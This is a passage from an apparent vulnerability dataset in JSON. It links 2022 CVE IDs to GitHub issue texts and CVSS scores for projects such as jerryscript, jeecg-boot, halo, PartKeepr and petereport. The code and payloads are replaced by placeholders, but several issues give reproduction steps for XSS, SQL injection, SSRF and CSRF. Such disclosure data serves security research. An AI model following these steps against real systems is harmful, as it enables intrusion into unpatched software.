  78632. "description": "ca bundle.crt includes distrusted certificates. Reported by Robert Bartel via blfs dev, and it also happens on my system: Just recently I noticed that the PATHTAG generated by make ca NUMBERTAG includes two explicitly distrusted certificates as indicated by their comments: APITAG It seems to me that p NUMBERTAG kit and APITAG can explicitly distrust certificates in their CA stores for various usage purposes while the PEM bundle format (ca APITAG used mainly by APITAG does not support this. So my interpretation is that all applications using the bundles will trust these bad certificates. As make ca uses p NUMBERTAG kit's \"trust extract\" utility to generate the PEM bundles, I looked in trust/extract pem.c of p NUMBERTAG kit NUMBERTAG Here it looks like it iterates over all certificates in the CA store and the trust status is only indicated by the generated comment line. But I could be wrong. I'm not wanting to create a APITAG account right now to report the issue to the p NUMBERTAG kit project, so I first ask here if anyone can confirm or reject this? For the time being I resorted to remove the bad certificates by using the following command line: CODETAG Thank you for reading this and keep up the good work!",
  78633. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  78634. "severity": "MEDIUM",
  78635. "baseScore": 6.5,
  78636. "impactScore": 3.6,
  78637. "exploitabilityScore": 2.8
  78638. },
  78639. {
  78640. "CVE_ID": "CVE-2022-21694",
  78641. "Issue_Url_old": "https://github.com/onionshare/onionshare/issues/1389",
  78642. "Issue_Url_new": "https://github.com/onionshare/onionshare/issues/1389",
  78643. "Repo_new": "onionshare/onionshare",
  78644. "Issue_Created_At": "2021-08-15T16:57:30Z",
  78645. "description": "Use nginx as the web service, instead of flask's APITAG Right now when APITAG starts a web service, it uses APITAG to start it directly in flask. I think instead we should launch an nginx subprocess and use that along with gunicorn to host the flask app. We already have an issue to use gunicorn NUMBERTAG instead of flask directly, and this will be much simpler if we use nginx If we use nginx, we can get gzip for free and don't need to gzip everything and fill up APITAG NUMBERTAG and I suspect we could simplify a lot of the web server code in other ways too If we use nginx, we get simple working range requests NUMBERTAG If we use nginx and implement the download accelerator NUMBERTAG we get much better performance, e.g. quicker download speeds Before implementing this, I'm not sure how a few things will work: Progress bars. If someone downloads a file from nginx, how can we hook into the real time file transfer to make progress bars work? APITAG sharing after files have been sent\". How do we know that the files are finished sending?",
  78646. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  78647. "severity": "MEDIUM",
  78648. "baseScore": 5.3,
  78649. "impactScore": 1.4,
  78650. "exploitabilityScore": 3.9
  78651. },
  78652. {
  78653. "CVE_ID": "CVE-2022-21711",
  78654. "Issue_Url_old": "https://github.com/liyansong2018/elfspirit/issues/1",
  78655. "Issue_Url_new": "https://github.com/liyansong2018/elfspirit/issues/1",
  78656. "Repo_new": "liyansong2018/elfspirit",
  78657. "Issue_Created_At": "2022-01-23T12:32:42Z",
  78658. "description": "Out of bounds read in elf parsing.. poc APITAG log ERRORTAG FILETAG",
  78659. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  78660. "severity": "HIGH",
  78661. "baseScore": 7.1,
  78662. "impactScore": 5.2,
  78663. "exploitabilityScore": 1.8
  78664. },
  78665. {
  78666. "CVE_ID": "CVE-2022-2191",
  78667. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/8161",
  78668. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/8161",
  78669. "Repo_new": "eclipse/jetty.project",
  78670. "Issue_Created_At": "2022-06-13T13:35:36Z",
  78671. "description": "Improve APITAG buffers handling. Jetty version(s NUMBERTAG Description APITAG 's buffers utilization and their pooling should be reviewed.",
  78672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78673. "severity": "HIGH",
  78674. "baseScore": 7.5,
  78675. "impactScore": 3.6,
  78676. "exploitabilityScore": 3.9
  78677. },
  78678. {
  78679. "CVE_ID": "CVE-2022-22123",
  78680. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1557",
  78681. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1557",
  78682. "Repo_new": "halo-dev/halo",
  78683. "Issue_Created_At": "2021-12-02T14:09:30Z",
  78684. "description": "\u5904\u7406\u540e\u53f0\u5404\u4e2a\u8f93\u5165\u6846\u7684 XSS \u5b89\u5168\u95ee\u9898. What is version of Halo has the issue NUMBERTAG What database are you using? H2 What is your deployment method? Fat Jar Your site address. _No response_ What happened? APITAG APITAG APITAG Relevant log output _No response_ Additional information _No response_",
  78685. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78686. "severity": "MEDIUM",
  78687. "baseScore": 5.4,
  78688. "impactScore": 2.7,
  78689. "exploitabilityScore": 2.3
  78690. },
  78691. {
  78692. "CVE_ID": "CVE-2022-22124",
  78693. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1575",
  78694. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1575",
  78695. "Repo_new": "halo-dev/halo",
  78696. "Issue_Created_At": "2021-12-06T12:01:50Z",
  78697. "description": "\u4e0a\u4f20 SVG \u56fe\u7247\u53ef\u80fd\u5f15\u53d1\u7684 XSS NUMBERTAG H2 \u4f7f\u7528\u7684\u54ea\u79cd\u65b9\u5f0f\u90e8\u7f72\uff1f Fat Jar \u5728\u7ebf\u7ad9\u70b9\u5730\u5740 _No response_ \u53d1\u751f\u4e86\u4ec0\u4e48\uff1f SVG \u6587\u4ef6\u5305\u542b JS \u811a\u672c\u53ef\u80fd\u4f1a\u5f15\u53d1\u7684 XSS APITAG SVG \u6587\u4ef6\u793a\u4f8b\uff1a CODETAG \u76f8\u5173\u65e5\u5fd7\u8f93\u51fa _No response_ \u9644\u52a0\u4fe1\u606f _No response_",
  78698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78699. "severity": "MEDIUM",
  78700. "baseScore": 5.4,
  78701. "impactScore": 2.7,
  78702. "exploitabilityScore": 2.3
  78703. },
  78704. {
  78705. "CVE_ID": "CVE-2022-22293",
  78706. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/20237",
  78707. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/20237",
  78708. "Repo_new": "dolibarr/dolibarr",
  78709. "Issue_Created_At": "2022-03-01T13:37:10Z",
  78710. "description": "HTML injection in FILETAG , Dolibarr NUMBERTAG Bug There is a proof of concept for a XSS on FILETAG for Dolibarr NUMBERTAG see URLTAG It would be useful to have a check/ statement if the problem still exist in newer versions, or it is already fixed (and if so, in which version). Environment Version NUMBERTAG Environment OS _No response_ Environment Web server _No response_ Environment PHP _No response_ Environment Database _No response_ Environment URL(s) _No response_ Expected and actual behavior _No response_ Steps to reproduce the behavior _No response_ Attached files _No response_",
  78711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78712. "severity": "MEDIUM",
  78713. "baseScore": 5.4,
  78714. "impactScore": 2.7,
  78715. "exploitabilityScore": 2.3
  78716. },
  78717. {
  78718. "CVE_ID": "CVE-2022-22701",
  78719. "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1229",
  78720. "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1229",
  78721. "Repo_new": "partkeepr/partkeepr",
  78722. "Issue_Created_At": "2022-01-04T13:52:52Z",
  78723. "description": "The functionality add attachment to parts allows access to local files.. FILETAG FILETAG System Information APITAG Version NUMBERTAG and NUMBERTAG Operating System: Linux Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes.",
  78724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  78725. "severity": "MEDIUM",
  78726. "baseScore": 6.5,
  78727. "impactScore": 3.6,
  78728. "exploitabilityScore": 2.8
  78729. },
  78730. {
  78731. "CVE_ID": "CVE-2022-22702",
  78732. "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1230",
  78733. "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1230",
  78734. "Repo_new": "partkeepr/partkeepr",
  78735. "Issue_Created_At": "2022-01-04T14:31:21Z",
  78736. "description": "The functionality add attachment to parts allows access to local ports (SSRF).. FILETAG FILETAG FILETAG System Information APITAG Version NUMBERTAG and NUMBERTAG Operating System: Linux Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes.",
  78737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  78738. "severity": "MEDIUM",
  78739. "baseScore": 4.3,
  78740. "impactScore": 1.4,
  78741. "exploitabilityScore": 2.8
  78742. },
  78743. {
  78744. "CVE_ID": "CVE-2022-22846",
  78745. "Issue_Url_old": "https://github.com/paulc/dnslib/issues/30",
  78746. "Issue_Url_new": "https://github.com/paulc/dnslib/issues/30",
  78747. "Repo_new": "paulc/dnslib",
  78748. "Issue_Created_At": "2022-01-08T15:35:02Z",
  78749. "description": "Client does not validate DNS transaction id. Hi, dnslib client does not validate DNS transaction id (TXID) as specified in the FILETAG . Attackers can use this to redirect users to their malicious name servers. I know the client created for testing but other projects using dnslib as a dependency might be affected as well. I suggest to add a simple validate: ERRORTAG",
  78750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  78751. "severity": "MEDIUM",
  78752. "baseScore": 5.3,
  78753. "impactScore": 1.4,
  78754. "exploitabilityScore": 3.9
  78755. },
  78756. {
  78757. "CVE_ID": "CVE-2022-22868",
  78758. "Issue_Url_old": "https://github.com/GibbonEdu/core/issues/1594",
  78759. "Issue_Url_new": "https://github.com/gibbonedu/core/issues/1594",
  78760. "Repo_new": "gibbonedu/core",
  78761. "Issue_Created_At": "2022-01-03T03:47:42Z",
  78762. "description": "A Stored Cross Site Scripting (XSS) injection vulnerability exists in Gibbon CMS version APITAG APITAG + VULNERABLE A Stored Cross Site Scripting (XSS) injection vulnerability exists in Gibbon CMS version APITAG . An attacker can inject arbitrary javascripts in PATHTAG APITAG via the \u2018name\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: Gibbon CMS + Version: APITAG + Browser Chrome Describe the bug + The vulnerability is present in the PATHTAG APITAG and can be exploited throuth a POST request via the \u2018name\u2019 parameters. Because of lacking of sanitizer of input data in param name allow inject code javascripts FILETAG FILETAG APITAG Impact + An attacker can send javascripts code through any vulnerable form field to change the design of the website or any information displayed to the user, saving the information persistently on the site (e.g. database). Suggestions + User input should be HTML encoded at any point where it is copied into application responses. All HTML metacharacters, including < > \" ' and =, should be replaced with the corresponding HTML entities (< > etc). To Reproduce APITAG NUMBERTAG After login account admin , you can see admin panel, click timetable admin FILETAG NUMBERTAG You can create a new on record and injection code javascripts into field name as show below FILETAG FILETAG NUMBERTAG As can be seen from the following evidence, the content of the injection was correctly saved on the page (on the database) and executed. FILETAG Screenshots Request: FILETAG Response: FILETAG APITAG",
  78763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  78764. "severity": "MEDIUM",
  78765. "baseScore": 4.8,
  78766. "impactScore": 2.7,
  78767. "exploitabilityScore": 1.7
  78768. },
  78769. {
  78770. "CVE_ID": "CVE-2022-22880",
  78771. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3347",
  78772. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3347",
  78773. "Repo_new": "jeecgboot/jeecg-boot",
  78774. "Issue_Created_At": "2022-01-04T06:28:26Z",
  78775. "description": "SQL injection exists in PATHTAG NUMBERTAG After testing, it is found that the code parameter of PATHTAG interface of jeecg boot has SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a PATHTAG FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG FILETAG FILETAG \u53cb\u60c5\u63d0\u793a\uff08\u4e3a\u4e86\u63d0\u9ad8issue\u5904\u7406\u6548\u7387\uff09\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389; \u8bf7\u81ea\u5df1\u521d\u5224\u95ee\u9898\u63cf\u8ff0\u662f\u5426\u6e05\u695a\uff0c\u662f\u5426\u65b9\u4fbf\u6211\u4eec\u8c03\u67e5\u5904\u7406\uff1b APITAG \u63cf\u8ff0\u8fc7\u4e8e\u7b80\u5355\u6216\u6a21\u7cca\uff0c\u5bfc\u81f4\u65e0\u6cd5\u5904\u7406\u7684\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389\uff1b",
  78776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78777. "severity": "CRITICAL",
  78778. "baseScore": 9.8,
  78779. "impactScore": 5.9,
  78780. "exploitabilityScore": 3.9
  78781. },
  78782. {
  78783. "CVE_ID": "CVE-2022-22881",
  78784. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3348",
  78785. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3348",
  78786. "Repo_new": "jeecgboot/jeecg-boot",
  78787. "Issue_Created_At": "2022-01-04T08:36:23Z",
  78788. "description": "SQL injection exists in PATHTAG \u7248\u672c\u53f7\uff1a jeecg boot NUMBERTAG After testing, it is found that the code parameter of PATHTAG interface of jeecg boot has SQL injection Reuse URLTAG After the source code of the project starts the project, click \"custom component\" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a payload: PATHTAG FILETAG or PATHTAG FILETAG Using sqlmap FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG FILETAG FILETAG \u53cb\u60c5\u63d0\u793a\uff08\u4e3a\u4e86\u63d0\u9ad8issue\u5904\u7406\u6548\u7387\uff09\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389; \u8bf7\u81ea\u5df1\u521d\u5224\u95ee\u9898\u63cf\u8ff0\u662f\u5426\u6e05\u695a\uff0c\u662f\u5426\u65b9\u4fbf\u6211\u4eec\u8c03\u67e5\u5904\u7406\uff1b APITAG \u63cf\u8ff0\u8fc7\u4e8e\u7b80\u5355\u6216\u6a21\u7cca\uff0c\u5bfc\u81f4\u65e0\u6cd5\u5904\u7406\u7684\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389\uff1b",
  78789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78790. "severity": "CRITICAL",
  78791. "baseScore": 9.8,
  78792. "impactScore": 5.9,
  78793. "exploitabilityScore": 3.9
  78794. },
  78795. {
  78796. "CVE_ID": "CVE-2022-22885",
  78797. "Issue_Url_old": "https://github.com/dromara/hutool/issues/2042",
  78798. "Issue_Url_new": "https://github.com/dromara/hutool/issues/2042",
  78799. "Repo_new": "dromara/hutool",
  78800. "Issue_Created_At": "2021-12-26T12:41:33Z",
  78801. "description": "\u9ed8\u8ba4\u7684 APITAG \u4e3a\u4ec0\u4e48\u9009\u62e9 APITAG \u5462\uff1f. \u7248\u672c\u60c5\u51b5 JDK\u7248\u672c\uff1a corretto NUMBERTAG hutool NUMBERTAG hutool APITAG \u4e2d APITAG APITAG \u9ed8\u8ba4\u4f20\u5165\u7684 APITAG \u662f APITAG CODETAG \u67e5\u770b APITAG \u4ee3\u7801\u5982\u4e0b\uff1a CODETAG \u4ece doc \u770b\u5230 APITAG \u662f\u4e00\u79cd fallback \u673a\u5236\uff0c\u5f53\u8981\u8fde\u63a5\u7684 host \u4e0e\u670d\u52a1\u7aef\u8bc1\u4e66 server name \u4e0d\u5339\u914d\u65f6\u624d\u6709\u4f5c\u7528\u3002\u5e76\u4e14 APITAG \u7684\u9ed8\u8ba4\u673a\u5236\u662f\u8fd9\u65f6\u5019\u62d2\u7edd\u6b64\u7c7b\u8bf7\u6c42\u3002\u800c hutool \u5219\u9ed8\u8ba4\u653e\u884c\u6240\u6709\u8fd9\u7c7b\u8bf7\u6c42\u3002 \u5982\u679c\u8c03\u7528 APITAG \u65f6\u624b\u52a8\u4f20\u5165\u4e0a\u9762\u7684 APITAG CODETAG \u4e5f\u4f1a\u8bf7\u6c42\u6210\u529f\u3002\u6309\u6211\u7406\u89e3\u8fd9\u6837\u624d\u662f\u5408\u7406\u7684\uff0c\u5982\u679c\u670d\u52a1\u7aef\u8bc1\u4e66 server name \u4e0e host APITAG APITAG \u7684\u9ed8\u8ba4\u884c\u4e3a\u4f1a\u6709\u5751\uff0chutool \u624d\u53e6\u5916\u6307\u5b9a\u4e86 APITAG \u5462\uff1f \u8c22\u8c22\u3002",
  78802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78803. "severity": "CRITICAL",
  78804. "baseScore": 9.8,
  78805. "impactScore": 5.9,
  78806. "exploitabilityScore": 3.9
  78807. },
  78808. {
  78809. "CVE_ID": "CVE-2022-22888",
  78810. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4848",
  78811. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4848",
  78812. "Repo_new": "jerryscript-project/jerryscript",
  78813. "Issue_Created_At": "2021-12-07T10:36:37Z",
  78814. "description": "Stack overflow in ecma objects (ecma_op_object_find_own). APITAG revision NUMBERTAG URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  78815. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78816. "severity": "HIGH",
  78817. "baseScore": 7.8,
  78818. "impactScore": 5.9,
  78819. "exploitabilityScore": 1.8
  78820. },
  78821. {
  78822. "CVE_ID": "CVE-2022-22890",
  78823. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4847",
  78824. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4847",
  78825. "Repo_new": "jerryscript-project/jerryscript",
  78826. "Issue_Created_At": "2021-12-07T08:52:59Z",
  78827. "description": "Assertion 'arguments_type != SCANNER_ARGUMENTS_PRESENT && arguments_type != APITAG in js scanner util (scanner_pop_literal_pool). APITAG revision NUMBERTAG URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  78828. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78829. "severity": "MEDIUM",
  78830. "baseScore": 5.5,
  78831. "impactScore": 3.6,
  78832. "exploitabilityScore": 1.8
  78833. },
  78834. {
  78835. "CVE_ID": "CVE-2022-22891",
  78836. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4871",
  78837. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4871",
  78838. "Repo_new": "jerryscript-project/jerryscript",
  78839. "Issue_Created_At": "2021-12-09T07:38:01Z",
  78840. "description": "SEGV in ecma_ref_object_inline of ecma gc.c. APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78841. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78842. "severity": "MEDIUM",
  78843. "baseScore": 5.5,
  78844. "impactScore": 3.6,
  78845. "exploitabilityScore": 1.8
  78846. },
  78847. {
  78848. "CVE_ID": "CVE-2022-22892",
  78849. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4872",
  78850. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4872",
  78851. "Repo_new": "jerryscript-project/jerryscript",
  78852. "Issue_Created_At": "2021-12-09T07:41:05Z",
  78853. "description": "Assertion 'ecma_is_value_undefined (value) || ecma_is_value_null (value) || ecma_is_value_boolean (value) || ecma_is_value_number (value) || ecma_is_value_string (value) || ecma_is_value_bigint (value) || ecma_is_value_symbol (value) || ecma_is_value_object (value)' failed in ecma helpers APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78854. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78855. "severity": "MEDIUM",
  78856. "baseScore": 5.5,
  78857. "impactScore": 3.6,
  78858. "exploitabilityScore": 1.8
  78859. },
  78860. {
  78861. "CVE_ID": "CVE-2022-22893",
  78862. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4901",
  78863. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4901",
  78864. "Repo_new": "jerryscript-project/jerryscript",
  78865. "Issue_Created_At": "2021-12-13T09:33:54Z",
  78866. "description": "Stack overflow in APITAG of vm.c. APITAG revision Commit NUMBERTAG bd6 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78867. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78868. "severity": "HIGH",
  78869. "baseScore": 7.8,
  78870. "impactScore": 5.9,
  78871. "exploitabilityScore": 1.8
  78872. },
  78873. {
  78874. "CVE_ID": "CVE-2022-22895",
  78875. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4882",
  78876. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4882",
  78877. "Repo_new": "jerryscript-project/jerryscript",
  78878. "Issue_Created_At": "2021-12-09T13:20:38Z",
  78879. "description": "Heap buffer overflow in APITAG (ecma helpers conversion.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Another form of testcase Execution steps & Output ERRORTAG",
  78880. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78881. "severity": "HIGH",
  78882. "baseScore": 7.8,
  78883. "impactScore": 5.9,
  78884. "exploitabilityScore": 1.8
  78885. },
  78886. {
  78887. "CVE_ID": "CVE-2022-22901",
  78888. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4916",
  78889. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4916",
  78890. "Repo_new": "jerryscript-project/jerryscript",
  78891. "Issue_Created_At": "2022-01-02T19:10:38Z",
  78892. "description": "ICE: Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' failed at PATHTAG APITAG APITAG commit hash APITAG Build platform Ubuntu NUMBERTAG LTS Build steps PATHTAG clean compile flag= fsanitize=address lto=off error message=on profile=es NUMBERTAG subset stack limit NUMBERTAG debug logging=on line info=on poc ERRORTAG assert log ERRORTAG asan log ERRORTAG",
  78893. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78894. "severity": "MEDIUM",
  78895. "baseScore": 5.5,
  78896. "impactScore": 3.6,
  78897. "exploitabilityScore": 1.8
  78898. },
  78899. {
  78900. "CVE_ID": "CVE-2022-22912",
  78901. "Issue_Url_old": "https://github.com/TooTallNate/plist.js/issues/114",
  78902. "Issue_Url_new": "https://github.com/tootallnate/plist.js/issues/114",
  78903. "Repo_new": "tootallnate/plist.js",
  78904. "Issue_Created_At": "2022-01-06T05:41:28Z",
  78905. "description": "Prototype Pollution using APITAG Hi, There's a prototype pollution in APITAG related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter. ERRORTAG More information about the vulnerability: FILETAG",
  78906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78907. "severity": "CRITICAL",
  78908. "baseScore": 9.8,
  78909. "impactScore": 5.9,
  78910. "exploitabilityScore": 3.9
  78911. },
  78912. {
  78913. "CVE_ID": "CVE-2022-22919",
  78914. "Issue_Url_old": "https://github.com/jdordonezn/CVE-2022-22919/issues/1",
  78915. "Issue_Url_new": "https://github.com/jdordonezn/cve-2022-22919/issues/1",
  78916. "Repo_new": "jdordonezn/CVE-2022-22919",
  78917. "Issue_Created_At": "2022-01-26T19:49:12Z",
  78918. "description": "Open redirect in APITAG APITAG NUMBERTAG APITAG APITAG platform version NUMBERTAG or earlier is vulnerable to open redirection for any authenticated user on the platform. An attacker can send an open redirect to the victim, redirecting them to a phishing or other malicious domain, controlled by the attacker. Payload : FILETAG FILETAG APITAG FILETAG",
  78919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  78920. "severity": "MEDIUM",
  78921. "baseScore": 6.1,
  78922. "impactScore": 2.7,
  78923. "exploitabilityScore": 2.8
  78924. },
  78925. {
  78926. "CVE_ID": "CVE-2022-23047",
  78927. "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/1546",
  78928. "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/1546",
  78929. "Repo_new": "exponentcms/exponent-cms",
  78930. "Issue_Created_At": "2022-01-28T13:28:27Z",
  78931. "description": "Exponent CMS Security Issues. I reported NUMBERTAG ulnerabilities on Exponent NUMBERTAG patch2) using FILETAG but i haven't received any response. Attached below are the links to the tickets, advisories and our responsible disclosure policy respectively. Ticket Stored XSS APITAG URLTAG . Advisory Stored XSS APITAG URLTAG . Ticket File Upload RCE APITAG Extension) URLTAG Advisory File Upload RCE APITAG Extension) URLTAG . Ticket Stored XSS APITAG Agent) URLTAG Advisory Stored XSS APITAG Agent) URLTAG . Security Policy URLTAG .",
  78932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  78933. "severity": "MEDIUM",
  78934. "baseScore": 4.8,
  78935. "impactScore": 2.7,
  78936. "exploitabilityScore": 1.7
  78937. },
  78938. {
  78939. "CVE_ID": "CVE-2022-23051",
  78940. "Issue_Url_old": "https://github.com/1modm/petereport/issues/36",
  78941. "Issue_Url_new": "https://github.com/1modm/petereport/issues/36",
  78942. "Repo_new": "1modm/petereport",
  78943. "Issue_Created_At": "2022-02-08T18:57:55Z",
  78944. "description": "Security Issue Stored XSS APITAG Tree). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG allows an authenticated admin user to inject persistent javascript code while adding an APITAG Tree' by modifying the svg_file parameter. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Create a new Report NUMBERTAG Create a new Finding for the Report NUMBERTAG Go to APITAG > APITAG Reports NUMBERTAG Click on APITAG in the last created record NUMBERTAG Go to APITAG Trees NUMBERTAG Click on APITAG Attack Tree NUMBERTAG Select your Finding and click on APITAG and Finish NUMBERTAG Intercept the request and insert javascript code inside the svg_file parameter. APITAG NUMBERTAG If a user visits the attack tree the javascript code will be rendered. Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
  78945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78946. "severity": "MEDIUM",
  78947. "baseScore": 5.4,
  78948. "impactScore": 2.7,
  78949. "exploitabilityScore": 2.3
  78950. },
  78951. {
  78952. "CVE_ID": "CVE-2022-23052",
  78953. "Issue_Url_old": "https://github.com/1modm/petereport/issues/34",
  78954. "Issue_Url_new": "https://github.com/1modm/petereport/issues/34",
  78955. "Repo_new": "1modm/petereport",
  78956. "Issue_Created_At": "2022-02-07T20:20:42Z",
  78957. "description": "Security Issue CSRF APITAG user,product,etc). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings in the application. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Create a malicious html file with the following content. CODETAG NUMBERTAG If an authenticated admin visits the malicious url, the user with the correspond id will be deleted Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
  78958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  78959. "severity": "MEDIUM",
  78960. "baseScore": 6.5,
  78961. "impactScore": 3.6,
  78962. "exploitabilityScore": 2.8
  78963. },
  78964. {
  78965. "CVE_ID": "CVE-2022-23094",
  78966. "Issue_Url_old": "https://github.com/libreswan/libreswan/issues/585",
  78967. "Issue_Url_new": "https://github.com/libreswan/libreswan/issues/585",
  78968. "Repo_new": "libreswan/libreswan",
